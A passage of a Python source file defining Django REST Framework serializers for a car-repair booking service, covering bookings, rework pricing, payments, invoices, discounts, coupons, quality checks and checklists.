validated_data.get('extra')\n if booking.rework_booking_id is not None and not extra:\n validated_data['part_price'] = 0\n validated_data['material_price'] = 0\n validated_data['labour_price'] = 0\n\n bp_obj = BookingPackage.objects.create(**validated_data)\n if bp_obj.package.package.category == Package.CATEGORY_DENT:\n for bp_panel in bp_panels:\n extra = bp_panel.get('extra')\n if booking.rework_booking_id is not None and not extra:\n bp_panel['part_price'] = 0\n bp_panel['material_price'] = 0\n bp_panel['labour_price'] = 0\n BookingPackagePanel.objects.create(booking_package=bp_obj, **bp_panel)\n return bp_obj\n\n def update(self, instance, validated_data):\n booking = instance.booking\n if booking.status.flow_order_num >= 15:\n raise serializers.ValidationError(\"Cannot update package after Work Completed.\")\n bp_panels = validated_data.pop('booking_package_panel',[])\n\n extra = validated_data.get('extra')\n if booking.rework_booking_id is not None and not extra:\n validated_data['part_price'] = 0\n validated_data['material_price'] = 0\n validated_data['labour_price'] = 0\n\n for attr, value in validated_data.items():\n if not isinstance(value, (list,dict)):\n setattr(instance, attr, value)\n\n if instance.package.package.category == Package.CATEGORY_DENT:\n if bp_panels:\n BookingPackagePanel.objects.filter(booking_package=instance).delete()\n for bp_panel in bp_panels:\n extra = bp_panel.get('extra')\n if booking.rework_booking_id is not None and not extra:\n bp_panel['part_price'] = 0\n bp_panel['material_price'] = 0\n bp_panel['labour_price'] = 0\n BookingPackagePanel.objects.create(booking_package=instance,**bp_panel)\n\n return instance\n\n\nclass BookingAddressSerializer(DynamicFieldsModelSerializer):\n address = AddressSerializer(remove_fields=['id'],read_only=True)\n useraddress_id = serializers.IntegerField(write_only=True)\n\n class Meta:\n model = BookingAddress\n fields = ('__all__')\n read_only_fields=('user',)\n\n def create(self, validated_data):\n ba = bookingManager.save_booking_address(validated_data)\n return ba\n\n\nclass BookingCheckpointSerializer(DynamicFieldsModelSerializer):\n class Meta:\n model = BookingCheckpoint\n fields = ('__all__')\n depth = 1\n\n\nclass BookingFlagSerializer(serializers.ModelSerializer):\n flag_type = FlagTypeSerializer(read_only=True)\n\n class Meta:\n model = BookingFlag\n fields = '__all__'\n\n def to_internal_value(self, data):\n self.fields['flag_type'] = serializers.PrimaryKeyRelatedField(queryset=FlagType.objects.filter(active=True),\n required=False)\n return super(BookingFlagSerializer, self).to_internal_value(data)\n\n def to_representation(self, obj):\n if self.fields.get('flag_type'):\n self.fields['flag_type'] = FlagTypeSerializer()\n return super(BookingFlagSerializer, self).to_representation(obj)\n\n\nclass BookingBillSerializer(DynamicFieldsModelSerializer):\n booking_package = BookingPackageSerializer(many=True, remove_fields=['booking'])\n bill_details = serializers.SerializerMethodField()\n payment_details = serializers.SerializerMethodField()\n user = UserSerializer(remove_fields=['city','designation','company_name',\n 'city_id','groups','ops_phone','user_credit',\n 'is_email_verified', 'active_devices',\n 'user_detail','referral'])\n class Meta:\n model = Booking\n fields = ('booking_package','bill_details','id','payment_details','user')\n\n def get_bill_details(self, obj):\n return bookingManager.get_bill_details_old(obj)\n\n def get_payment_details(self, obj):\n return 
paymentManager.get_payment_details(obj)\n\n @classmethod\n def setup_eager_loading(cls, queryset):\n \"\"\" Perform necessary eager loading of data. \"\"\"\n queryset = queryset.select_related('status',\n 'ops_status',\n 'user').prefetch_related('booking_package',\n 'booking_package__booking_package_panel',\n 'booking_package__booking_package_panel__panel',\n 'booking_package__booking_package_panel__panel__car_panel',\n 'booking_package__package',\n 'booking_package__package__package',\n 'booking_discount',\n 'booking_invoice',\n Prefetch(\n \"booking_invoice__invoice_payment\",\n queryset=Payment.objects.filter(payment_for=Payment.PAYMENT_FOR_USER,\n tx_type=Payment.TX_TYPE_PAYMENT).order_by('-id'),\n to_attr='payments'\n ),\n 'user__user_credit',\n 'booking_coupon',\n 'booking_coupon__coupon'\n )\n return queryset\n\n\nclass BookingStatusSerializer(DynamicFieldsModelSerializer):\n class Meta:\n model = BookingStatus\n fields = ('__all__')\n\n\nclass BookingOpsStatusSerializer(DynamicFieldsModelSerializer):\n class Meta:\n model = BookingOpsStatus\n fields = ('__all__')\n\n\nclass PaymentSerializer(DynamicFieldsModelSerializer):\n class Meta:\n model = Payment\n fields = ('__all__')\n\n\nclass BookingSerializer(serializers.ModelSerializer):\n booking_package = BookingPackageSerializer(many=True, remove_fields=['booking'],required=False)\n # booking_package = BookingPackageSerializer(many=True, remove_fields=['booking'],\n # change_serializer={\n # 'booking_package_panel':BookingPackagePanelSerializer(\n # remove_fields=['booking_package'],\n # many=True,\n # required=False)},\n # required=False)\n booking_address = BookingAddressSerializer(many=True, remove_fields=['booking'], required=False)\n bill_details = serializers.SerializerMethodField()\n payment_details = serializers.SerializerMethodField()\n user = serializers.PrimaryKeyRelatedField(read_only=True)\n status = BookingStatusSerializer(read_only=True)\n ops_status = BookingOpsStatusSerializer(read_only=True)\n city = serializers.PrimaryKeyRelatedField(queryset=City.objects.all(), required=False)\n action = serializers.IntegerField(write_only=True,required=False)\n booking_checkpoint = BookingCheckpointSerializer(many=True, remove_fields=['booking'],read_only=True)\n #quoted_price = serializers.DecimalField(max_digits=10,decimal_places=2,read_only=True)\n pickup_driver_details = UserSerializer(read_only=True, source='pickup_driver',\n remove_fields=['groups','user_credit','city','active_devices','user_detail',\n 'referral'])\n drop_driver_details = UserSerializer(read_only=True, source='drop_driver',\n remove_fields=['groups','user_credit','city','active_devices','user_detail',\n 'referral'])\n workshop_manager_details = UserSerializer(read_only=True, source='workshop_manager',\n remove_fields=['groups','user_credit','city','active_devices',\n 'user_detail','referral'])\n user_id = serializers.PrimaryKeyRelatedField(\n queryset=get_user_model().objects.all(), source='user', write_only=True, required=False)\n #payments = serializers.SerializerMethodField()\n booking_rework = serializers.PrimaryKeyRelatedField(read_only=True, many=True)\n workshop_images = serializers.ListField(write_only=True, required=False, child=serializers.DictField())\n eod_message = serializers.SerializerMethodField()\n checked_items = serializers.ListField(child=TestedQualityCheckSerializer(), write_only=True, required=False)\n item_list = serializers.ListField(child=BookingChecklistItemCreateSerializer(),\n write_only=True, required=False)\n reason_text = 
serializers.CharField(write_only=True, required=False, allow_null=True) # Reason for delay.\n return_reason = ReturnReasonsSerializer()\n booking_flag = BookingFlagSerializer(read_only=True, many=True)\n\n class Meta:\n model = Booking\n exclude = ('followup',)\n #fields = ('booking_package','booking_address','status','booking_bill','user','city','booking_checkpoint','action')\n\n def to_internal_value(self, data):\n self.fields['return_reason'] = serializers.PrimaryKeyRelatedField(queryset=CarReturnReasons.objects.all(),\n required=False)\n return super(BookingSerializer, self).to_internal_value(data)\n\n def to_representation(self, obj):\n self.fields['return_reason'] = ReturnReasonsSerializer()\n self.fields['workshop_asst_mgr'] = UserSerializer(new_fields=['id', 'name', 'ops_phone', 'email'])\n return super(BookingSerializer, self).to_representation(obj)\n\n def get_bill_details(self, obj):\n return bookingManager.get_bill_details_new(obj)\n\n def get_payment_details(self, obj):\n return paymentManager.get_payment_details(obj)\n\n def get_eod_message(self, obj):\n return bookingManager.get_latest_eod_message(obj)\n\n # def get_payments(self, obj):\n # return paymentManager.get_payments(obj)\n\n @classmethod\n def setup_eager_loading(cls, queryset, internal):\n \"\"\" Perform necessary eager loading of data. \"\"\"\n from django.db.models import F\n queryset = queryset.select_related('status',\n 'city',\n 'ops_status',\n 'pickup_driver',\n 'drop_driver',\n 'workshop_manager',\n 'return_reason',\n 'user'\n ).prefetch_related(\n 'booking_address',\n 'booking_address__address',\n 'booking_checkpoint',\n 'booking_checkpoint__status',\n 'booking_discount',\n 'booking_invoice',\n 'booking_proforma_invoice',\n 'booking_flag',\n 'user__user_credit',\n Prefetch(\n 'user__user_credittrx',\n queryset=CreditTransaction.objects.filter(\n entity=CreditTransaction.ENTITY_BOOKING,\n trans_type=CreditTransaction.TRANSACTION_TYPE_DEBIT,\n )\n ),\n Prefetch(\n \"booking_invoice__invoice_payment\",\n queryset=Payment.objects.filter(\n payment_for=Payment.PAYMENT_FOR_USER,\n ).order_by('-id'),\n to_attr='payments'\n ),\n Prefetch(\n \"booking_proforma_invoice__proforma_invoice_payment\",\n queryset=Payment.objects.filter(\n payment_for=Payment.PAYMENT_FOR_USER,\n ).order_by('-id'),\n to_attr='proforma_payments'\n ),\n 'booking_coupon',\n 'booking_coupon__coupon',\n 'booking_rework',\n Prefetch(\n 'message_booking',\n queryset=Messages.objects.filter(\n label=Messages.LABEL_EOD).order_by('-created_at')\n )\n )\n if internal:\n queryset = queryset.prefetch_related('booking_package',\n 'booking_package__booking_package_panel',\n 'booking_package__booking_package_panel__panel',\n 'booking_package__booking_package_panel__panel__car_panel',\n 'booking_package__package',\n 'booking_package__package__package',)\n else:\n queryset = queryset.prefetch_related(Prefetch('booking_package',\n queryset=BookingPackage.objects.filter(package__package__internal=False).prefetch_related(\n Prefetch('booking_package_panel',\n queryset=BookingPackagePanel.objects.filter(panel__car_panel__internal=False,\n panel__internal=False).prefetch_related(\n 'panel',\n 'panel__car_panel',\n )\n ),\n 'package',\n 'package__package'),\n ),\n )\n return queryset\n\n def create(self, validated_data):\n return bookingManager.create_booking(validated_data)\n\n def update(self, instance, validated_data):\n return bookingManager.update_booking(instance, validated_data)\n\n def save(self, **kwargs):\n request = self.context['request']\n 
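# Stamp audit fields (updating user and source device) from the request before saving.\n 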
kwargs['updated_by'] = request.user\n kwargs['device_type'] = request.META.get('HTTP_SOURCE')\n super(BookingSerializer, self).save(**kwargs)\n\n\nclass GetSlotSerializer(serializers.Serializer):\n car_model = serializers.IntegerField(write_only=True, required=False)\n type = serializers.ChoiceField(write_only=True, required=True, choices=BookingAddress.ADDRESS_TYPES)\n is_doorstep = serializers.BooleanField(write_only=True, required=False)\n city = serializers.PrimaryKeyRelatedField(queryset=City.objects.filter(active=True), required=False)\n\n\nclass BookingFollowupSerializer(DynamicFieldsModelSerializer):\n followup = FollowupSerializer(many=True)\n class Meta:\n model = Booking\n fields = ('id','followup','assigned_to','next_followup')\n\n def update(self, instance, validated_data):\n return bookingManager.update_followup(instance, validated_data)\n\n def save(self, **kwargs):\n request = self.context.get('request')\n kwargs['updated_by'] = request.user\n super(BookingFollowupSerializer, self).save(**kwargs)\n\n @classmethod\n def setup_eager_loading(cls, queryset, internal):\n \"\"\" Perform necessary eager loading of data. \"\"\"\n queryset = queryset.prefetch_related(Prefetch(\n 'followup',\n Followup.objects.order_by('-created_at').select_related('updated_by',\n 'result'),\n ))\n return queryset\n\n\nclass InitiatePaymentSerializer(serializers.Serializer):\n payment_type = serializers.ChoiceField(choices=Payment.PAYMENT_TYPES)\n amount = serializers.DecimalField(max_digits=10,decimal_places=2,min_value=0,required=False)\n\n\nclass ProcessPaymentSerializer(serializers.Serializer):\n vendor_id = serializers.CharField()\n payment_id = serializers.IntegerField(required=False)\n net_amount_debit = serializers.DecimalField(max_digits=10, decimal_places=2, min_value=0)\n status = serializers.CharField()\n vendor_status = serializers.CharField(required=False)\n error_message = serializers.CharField(required=False)\n vendor = serializers.ChoiceField(choices=Payment.VENDOR_LIST)\n vendor_tx_data = serializers.CharField(required=False)\n mode = serializers.ChoiceField(choices=Payment.PAYMENT_MODES)\n payment_type = serializers.ChoiceField(choices=Payment.PAYMENT_TYPES, required=False)\n cheque_num = serializers.CharField(max_length=20, required=False)\n cheque_bank = serializers.CharField(max_length=32, required=False)\n tx_type = serializers.ChoiceField(choices=Payment.TX_TYPES, required=False)\n used_credits = serializers.DecimalField(max_digits=10, decimal_places=2, min_value=0, required=False)\n\n\nclass CouponDetailSerializer(serializers.Serializer):\n coupon_code = serializers.CharField()\n\n\nclass DriverBookingSerializer(serializers.ModelSerializer):\n booking_package = BookingPackageSerializer(many=True, remove_fields=['booking'],required=False)\n # booking_package = BookingPackageSerializer(many=True, remove_fields=['booking'],\n # change_serializer={\n # 'booking_package_panel': BookingPackagePanelSerializer(\n # remove_fields=['booking_package'],\n # many=True,\n # required=False)},\n # required=False)\n booking_address = BookingAddressSerializer(many=True, remove_fields=['booking'],required=False)\n bill_details = serializers.SerializerMethodField()\n payment_details = serializers.SerializerMethodField()\n user = UserSerializer(read_only=True, remove_fields=['referral'])\n status = BookingStatusSerializer(read_only=True)\n ops_status = BookingOpsStatusSerializer(read_only=True)\n city = serializers.PrimaryKeyRelatedField(queryset=City.objects.all(), required=False)\n action = 
serializers.IntegerField(write_only=True,required=False)\n pickup_driver_details = UserSerializer(read_only=True, source='pickup_driver',\n new_fields=['name', 'email', 'phone', 'ops_phone'])\n drop_driver_details = UserSerializer(read_only=True, source='drop_driver',\n new_fields=['name', 'email', 'phone', 'ops_phone'])\n workshop_manager_details = UserSerializer(read_only=True, source='workshop_manager',\n new_fields=['name', 'email', 'phone', 'ops_phone'])\n workshop_details = WorkshopSerializer(read_only=True, source='workshop')\n usercar_details = UserCarSerializer(source='usercar', read_only=True, remove_fields=['active_bookings'])\n user_id = serializers.PrimaryKeyRelatedField(\n queryset=get_user_model().objects.all(), source='user', write_only=True, required=False)\n payments = PaymentSerializer(many=True,\n remove_fields=[\n 'tx_data',\n 'tx_type',\n 'payment_for',\n 'vendor',\n 'payment_vendor_id',\n 'refund_vendor_id',\n 'vendor_status',\n 'cheque_num',\n 'cheque_bank'],\n read_only=True)\n\n class Meta:\n model = Booking\n fields = ('__all__')\n\n def get_bill_details(self, obj):\n return bookingManager.get_bill_details_new(obj)\n\n def get_payment_details(self, obj):\n return paymentManager.get_payment_details(obj)\n\n @classmethod\n def setup_eager_loading(cls, queryset, internal):\n \"\"\" Perform necessary eager loading of data. \"\"\"\n\n queryset = queryset.select_related('status',\n 'city',\n 'ops_status',\n 'pickup_driver',\n 'drop_driver',\n 'workshop_manager',\n 'workshop',\n 'usercar',\n 'user').prefetch_related('booking_address',\n 'booking_address__address',\n 'booking_package',\n 'booking_package__booking_package_panel',\n 'booking_package__booking_package_panel__panel',\n 'booking_package__booking_package_panel__panel__car_panel',\n 'booking_package__package',\n 'booking_package__package__package',\n 'booking_discount',\n 'booking_invoice',\n 'user__user_credit',\n 'user__user_credittrx',\n Prefetch(\n \"booking_invoice__invoice_payment\",\n queryset=Payment.objects.filter(\n payment_for=Payment.PAYMENT_FOR_USER\n ).order_by('-id'),\n to_attr='payments'\n ),\n 'booking_coupon'\n )\n\n return queryset\n\n def create(self, validated_data):\n return bookingManager.create_booking(validated_data)\n\n def update(self, instance, validated_data):\n return bookingManager.update_booking(instance, validated_data)\n\n def save(self, **kwargs):\n request = self.context['request']\n kwargs['updated_by'] = request.user\n kwargs['device_type'] = request.META.get('HTTP_SOURCE')\n super(DriverBookingSerializer, self).save(**kwargs)\n\n\nclass BookingImageSerializer(CreateListModelMixin, serializers.ModelSerializer):\n media = serializers.FileField(write_only=True, required=False)\n media_url = serializers.SerializerMethodField()\n image_name = serializers.CharField(write_only=True, required=False)\n size = serializers.IntegerField(write_only=True, required=False)\n content_type = serializers.CharField(write_only=True, required=False)\n updated_by = serializers.PrimaryKeyRelatedField(default=serializers.CurrentUserDefault(),\n queryset=get_user_model().objects.all())\n\n class Meta:\n model = BookingImage\n fields = '__all__'\n\n def to_representation(self, obj):\n self.fields['updated_by'] = UserSerializer(\n read_only=True,\n new_fields=['id','name','phone','ops_phone'])\n self.fields['status'] = BookingStatusSerializer(read_only=True)\n self.fields['ops_status'] = BookingOpsStatusSerializer(read_only=True)\n self.fields['panel'] = CarPanelSerializer(new_fields=['id', 'name'], 
read_only=True)\n return super(BookingImageSerializer, self).to_representation(obj)\n\n def create(self, validated_data):\n return bookingManager.create_booking_image(validated_data)\n\n def get_media_url(self, obj):\n request = self.context['request']\n return bookingManager.get_media_url(request, obj.media)\n\n\nclass BookingDiscountSerializer(serializers.ModelSerializer):\n reason_dd_details = DiscountReasonsSerializer(source='reason_dd',\n read_only=True)\n class Meta:\n model = BookingDiscount\n fields = '__all__'\n\n def create(self, validated_data):\n bd_obj = super(BookingDiscountSerializer, self).create(validated_data)\n booking_invoices = bd_obj.booking.booking_invoice.filter(status__in=[BookingInvoice.INVOICE_STATUS_PENDING,\n BookingInvoice.INVOICE_STATUS_PAID])\n if booking_invoices:\n bookingManager.save_invoice(bd_obj.booking)\n\n send_custom_notification_task.delay('OPS_ADD_DISCOUNT_EMAIL',\n {'booking': bd_obj.booking_id,\n 'labour_discount': bd_obj.labour_discount,\n 'material_discount': bd_obj.material_discount,\n 'part_discount': bd_obj.part_discount,\n 'reason': bd_obj.reason,\n })\n return bd_obj\n\n def update(self, instance, validated_data):\n bd_obj = super(BookingDiscountSerializer, self).update(instance, validated_data)\n booking_invoices = bd_obj.booking.booking_invoice.filter(status__in=[BookingInvoice.INVOICE_STATUS_PENDING,\n BookingInvoice.INVOICE_STATUS_PAID])\n if booking_invoices:\n bookingManager.save_invoice(bd_obj.booking)\n return bd_obj\n\n\nclass BookingCouponSerializer(serializers.ModelSerializer):\n class Meta:\n model = BookingCoupon\n fields = '__all__'\n\n def create(self, validated_data):\n bc_obj = super(BookingCouponSerializer, self).create(validated_data)\n booking_invoices = bc_obj.booking.booking_invoice.filter(status__in=[BookingInvoice.INVOICE_STATUS_PENDING,\n BookingInvoice.INVOICE_STATUS_PAID])\n if booking_invoices:\n bookingManager.save_invoice(bc_obj.booking)\n\n return bc_obj\n\n def update(self, instance, validated_data):\n bc_obj = super(BookingCouponSerializer, self).update(instance, validated_data)\n booking_invoices = bc_obj.booking.booking_invoice.filter(status__in=[BookingInvoice.INVOICE_STATUS_PENDING,\n BookingInvoice.INVOICE_STATUS_PAID])\n if booking_invoices:\n bookingManager.save_invoice(bc_obj.booking)\n return bc_obj\n\n\nclass BookingListSerializer(DynamicFieldsModelSerializer):\n class Meta:\n model = Booking\n fields = ('id','usercar','status')\n\n @classmethod\n def setup_eager_loading(cls, queryset, internal):\n \"\"\" Perform necessary eager loading of data. \"\"\"\n return queryset\n\n\nclass BookingBillSerializerV2(serializers.ModelSerializer):\n # This is monstrously complex code.. 
Please do not touch it without knowledge..\n booking_package = BookingPackageSerializer(many=True, remove_fields=['booking'],required=False)\n # booking_package = BookingPackageSerializer(many=True, remove_fields=['booking'],\n # change_serializer={\n # 'package':PackagePriceSerializer(\n # read_only=True,\n # remove_fields=['id', 'city'],\n # change_serializer={\n # 'package':PackageSerializer(\n # new_fields=[\n # 'name', 'category'])}),\n # 'booking_package_panel':BookingPackagePanelSerializer(\n # remove_fields=['booking_package'],\n # change_serializer={'panel_details':\n # CarPanelPriceSerializer(\n # remove_fields=['id',\n # 'type_of_work_val',\n # 'updated_at',\n # 'created_at',\n # 'car_type',\n # 'car_model',\n # 'editable',\n # 'city'],\n # change_serializer={\n # 'car_panel': CarPanelSerializer(new_fields=['name'])\n # },\n # source='panel',\n # read_only=True)},\n # many=True,\n # required=False)},\n # required=False)\n bill_details = serializers.SerializerMethodField()\n payment_details = serializers.SerializerMethodField()\n user = UserSerializer(new_fields=['name','email','phone'])\n payment_gateway = serializers.SerializerMethodField()\n\n class Meta:\n model = Booking\n fields = ('id','booking_package','bill_details','payment_details','usercar','user','payment_gateway')\n\n def get_bill_details(self, obj):\n return bookingManager.get_bill_details_new(obj)\n\n def get_payment_details(self, obj):\n return paymentManager.get_payment_details(obj)\n\n def get_payment_gateway(self, obj):\n return getattr(settings,'PAYMENT_GATEWAY_TO_USE', 1)\n\n @classmethod\n def setup_eager_loading(cls, queryset):\n \"\"\" Perform necessary eager loading of data. \"\"\"\n\n queryset = queryset.select_related('user').prefetch_related(\n 'booking_discount',\n 'booking_invoice',\n 'booking_proforma_invoice',\n 'user__user_credit',\n 'user__user_credittrx',\n Prefetch(\n \"booking_invoice__invoice_payment\",\n queryset=Payment.objects.filter(payment_for=Payment.PAYMENT_FOR_USER,\n ).order_by('-id'),\n to_attr='payments'\n ),\n Prefetch(\n \"booking_proforma_invoice__proforma_invoice_payment\",\n queryset=Payment.objects.filter(payment_for=Payment.PAYMENT_FOR_USER,\n ).order_by('-id'),\n to_attr='proforma_payments'\n ),\n 'booking_coupon',\n 'booking_coupon__coupon'\n )\n queryset = queryset.prefetch_related('booking_package',\n 'booking_package__booking_package_panel',\n 'booking_package__booking_package_panel__panel',\n 'booking_package__booking_package_panel__panel__car_panel',\n 'booking_package__package',\n 'booking_package__package__package',)\n return queryset\n\n\nclass BookingCartSerializer(serializers.ModelSerializer):\n booking_package = BookingPackageSerializer(many=True, remove_fields=['booking'],required=False)\n # booking_package = BookingPackageSerializer(many=True, remove_fields=['booking'],\n # change_serializer={\n # 'booking_package_panel':BookingPackagePanelSerializer(\n # remove_fields=['booking_package'],\n # many=True,\n # required=False)},\n # required=False)\n bill_details = serializers.SerializerMethodField()\n payment_details = serializers.SerializerMethodField()\n\n class Meta:\n model = Booking\n fields = ('__all__')\n\n def get_bill_details(self, obj):\n return bookingManager.get_bill_details_new(obj)\n\n def get_payment_details(self, obj):\n return paymentManager.get_payment_details(obj)\n\n @classmethod\n def setup_eager_loading(cls, queryset, internal):\n \"\"\" Perform necessary eager loading of data. 
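Prefetches invoices, payments, discounts, coupons and package/panel rows up front to avoid per-row queries. 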
\"\"\"\n\n queryset = queryset.prefetch_related(\n 'booking_discount',\n 'booking_invoice',\n 'booking_proforma_invoice',\n 'user__user_credit',\n 'user__user_credittrx',\n Prefetch(\n \"booking_invoice__invoice_payment\",\n queryset=Payment.objects.filter(payment_for=Payment.PAYMENT_FOR_USER,\n ).order_by('-id'),\n to_attr='payments'\n ),\n Prefetch(\n \"booking_proforma_invoice__proforma_invoice_payment\",\n queryset=Payment.objects.filter(payment_for=Payment.PAYMENT_FOR_USER,\n ).order_by('-id'),\n to_attr='proforma_payments'\n ),\n 'booking_coupon',\n 'booking_coupon__coupon'\n )\n if internal:\n queryset = queryset.prefetch_related('booking_package',\n 'booking_package__booking_package_panel',\n 'booking_package__booking_package_panel__panel',\n 'booking_package__booking_package_panel__panel__car_panel',\n 'booking_package__package',\n 'booking_package__package__package',)\n else:\n queryset = queryset.prefetch_related(Prefetch('booking_package',\n queryset=BookingPackage.objects.filter(package__package__internal=False).prefetch_related(\n Prefetch('booking_package_panel',\n queryset=BookingPackagePanel.objects.filter(panel__car_panel__internal=False,\n panel__internal=False).prefetch_related(\n 'panel',\n 'panel__car_panel',\n )\n ),\n 'package',\n 'package__package'),\n ),\n )\n return queryset\n\n\nclass BookingFeedbackSerializer(serializers.ModelSerializer):\n class Meta:\n model = BookingFeedback\n fields = '__all__'\n validators = [ObjectUserValidator('booking', 'Booking')]\n\n\nclass BookingCustFeedbackSerializer(serializers.ModelSerializer):\n class Meta:\n model = BookingCustFeedback\n fields = '__all__'\n validators = [ObjectUserValidator('booking', 'Booking')]\n\n def create(self, validated_data):\n booking = validated_data.get('booking')\n instance = BookingCustFeedback.objects.filter(booking=booking).first()\n if instance:\n return super(BookingCustFeedbackSerializer, self).update(instance, validated_data)\n return super(BookingCustFeedbackSerializer,self).create(validated_data)\n\n\nclass EODNoticeSerializer(serializers.Serializer):\n action = serializers.ChoiceField(choices=list(ACTION_DICT.keys()), required=True)\n\n\nclass BookingProformaInvoiceSerializer(DynamicFieldsModelSerializer):\n class Meta:\n model = BookingProformaInvoice\n fields = '__all__'\n validators = [ObjectUserValidator('booking', 'Booking')]\n\n def create(self, validated_data):\n bookingManager.validate_proforma_invoice(validated_data)\n return super(BookingProformaInvoiceSerializer, self).create(validated_data)\n\n def update(self, instance, validated_data):\n return super(BookingProformaInvoiceSerializer, self).update(instance, validated_data)\n\n\nclass SaveEODSerializer(serializers.Serializer):\n message_type = serializers.ChoiceField(choices=Messages.MESSAGE_TYPES, required=True)\n message = serializers.CharField(max_length=4096, required=True)\n action = serializers.ChoiceField(choices=list(ACTION_DICT.keys()), required=False)\n\n\n# class BookingReworkSerializer(serializers.ModelSerializer):\n# booking_package = BookingPackageSerializer(many=True, remove_fields=['booking',],\n# change_serializer={\n# 'booking_package_panel':BookingPackagePanelSerializer(\n# remove_fields=['booking_package'],\n# many=True,\n# read_only=True)},\n# read_only=True)\n#\n# class Meta:\n# model = Booking\n# fields = ('__all__')\n#\n# @classmethod\n# def setup_eager_loading(cls, queryset, internal):\n# \"\"\" Perform necessary eager loading of data. 
\"\"\"\n#\n# queryset = queryset.prefetch_related('booking_package',\n# 'booking_package__booking_package_panel',\n# 'booking_package__booking_package_panel__panel',\n# 'booking_package__booking_package_panel__panel__car_panel',\n# 'booking_package__package',\n# 'booking_package__package__package',\n# 'booking_package__rework_package',\n# 'booking_package__booking_package_panel__rework_panel')\n# return queryset\n\n\nclass BookingReworkPackagePanelSerializer(ConflictAwareModelSerializer):\n panel_details = BookingPackagePanelSerializer(read_only=True, source='booking_package_panel')\n\n class Meta:\n model = BookingReworkPackagePanel\n fields = '__all__'\n\n def create(self, validated_data):\n booking_package_panel = validated_data.get('booking_package_panel')\n obj = super(BookingReworkPackagePanelSerializer, self).create(validated_data)\n booking_package_panel.rework = True\n booking_package_panel.save()\n return obj\n\n\nclass BookingReworkPackageSerializer(ConflictAwareModelSerializer):\n booking_package_details = BookingPackageSerializer(read_only=True,source='booking_package',\n remove_fields=['booking_package_panel'])\n class Meta:\n model = BookingReworkPackage\n fields = '__all__'\n\n def create(self, validated_data):\n booking_package = validated_data.get('booking_package')\n obj = super(BookingReworkPackageSerializer, self).create(validated_data)\n booking_package.rework = True\n booking_package.save()\n return obj\n\n\nclass WorkshopBookingSerializer(serializers.ModelSerializer):\n usercar_details = UserCarSerializer(source='usercar', read_only=True, remove_fields=['active_bookings'])\n status = BookingStatusSerializer(read_only=True)\n ops_status = BookingOpsStatusSerializer(read_only=True)\n booking_package = BookingPackageSerializer(many=True, remove_fields=['booking'],required=False)\n # booking_package = BookingPackageSerializer(many=True, remove_fields=['booking'],\n # change_serializer={\n # 'booking_package_panel': BookingPackagePanelSerializer(\n # remove_fields=['booking_package'],\n # many=True,\n # required=False)},\n # required=False, read_only=True)\n last_updated_since = serializers.SerializerMethodField()\n\n class Meta:\n model = Booking\n fields = ('__all__')\n\n def get_last_updated_since(self, booking):\n # return timezone.now()\n last_rec = booking.history.filter(\n updated_by__groups__name='WorkshopExecutive').order_by('-updated_at').first()\n if last_rec:\n return last_rec.updated_at\n return None\n\n @classmethod\n def setup_eager_loading(cls, queryset, internal):\n \"\"\" Perform necessary eager loading of data. 
\"\"\"\n\n return queryset.select_related('usercar',\n 'status',\n 'ops_status').prefetch_related(\n 'booking_package',\n 'booking_package__booking_package_panel',\n 'booking_package__booking_package_panel__panel',\n 'booking_package__booking_package_panel__panel__car_panel',\n 'booking_package__package',\n 'booking_package__package__package')\n\n def create(self, validated_data):\n return bookingManager.create_booking(validated_data)\n\n def update(self, instance, validated_data):\n return bookingManager.update_booking(instance, validated_data)\n\n def save(self, **kwargs):\n request = self.context['request']\n kwargs['updated_by'] = request.user\n kwargs['device_type'] = request.META.get('HTTP_SOURCE')\n super(WorkshopBookingSerializer, self).save(**kwargs)\n\n\nclass BookingQualityCheckSerializer(serializers.ModelSerializer):\n quality_check = QualityCheckSerializer(read_only=True)\n\n class Meta:\n model = BookingQualityChecks\n exclude = ('booking',)\n\n\nclass BookingTestedQualityCheckSerializer(serializers.Serializer):\n booking = serializers.PrimaryKeyRelatedField(queryset=Booking.objects.all(), required=True)\n checked_items = serializers.ListField(child=TestedQualityCheckSerializer())\n #qc_image = BookingImageSerializer(required=False)\n\n def create(self, validated_data):\n # :-)\n # if not Booking.objects.filter(id=validated_data.get('booking_id')).exists():\n # raise serializers.ValidationError(\"Invalid Booking Id.\")\n #\n # booking = Booking.objects.get(id=validated_data.get('booking_id'))\n booking = validated_data.get('booking')\n bookingManager.create_qc_checks(booking, validated_data)\n\n\nclass EntityChangeTrackerSerializer(serializers.ModelSerializer):\n delay_reason_details = DelayReasonsSerializer(read_only=True, source='delay_reason')\n updated_by_details = UserSerializer(source='updated_by',\n read_only=True,\n remove_fields=['groups','user_credit','city','active_devices','user_detail',\n 'referral'])\n updated_by = serializers.PrimaryKeyRelatedField(default=serializers.CurrentUserDefault(), write_only=True,\n queryset=get_user_model().objects.all())\n class Meta:\n model = EntityChangeTracker\n fields = ('__all__')\n\n\nclass TeamAlertSerializer(serializers.ModelSerializer):\n updated_by = serializers.PrimaryKeyRelatedField(default=serializers.CurrentUserDefault(),\n queryset=get_user_model().objects.all())\n reason_details = TeamAlertReasonSerializer(source='alert_reason', read_only=True,\n new_fields=['reason', 'reason_type'])\n\n class Meta:\n model = TeamAlert\n fields = ('__all__')\n\n\nclass BookingHandoverSerializer(serializers.ModelSerializer):\n item = HandoverItemSerializer(read_only=True)\n\n class Meta:\n model = BookingHandoverItem\n exclude = ('booking',)\n\n\nclass BookingHandoverCreateSerializer(serializers.Serializer):\n booking = serializers.PrimaryKeyRelatedField(queryset=Booking.objects.all(), required=True)\n item_list = serializers.ListField(child=BookingHandoverItemCreateSerializer())\n\n def create(self, validated_data):\n booking = validated_data.get('booking')\n return bookingManager.create_handover_list(booking, validated_data)\n\n\nclass BookingChecklistSerializer(serializers.ModelSerializer):\n item = ChecklistItemSerializer(read_only=True)\n media = MediaSerializer(read_only=True, many=True, new_fields=['media_url'])\n updated_by_details = UserSerializer(source='updated_by',\n read_only=True,\n new_fields=['id', 'name', 'email', 'phone', 'ops_phone'])\n\n class Meta:\n model = BookingChecklist\n exclude = ('booking',)\n\n\nclass 
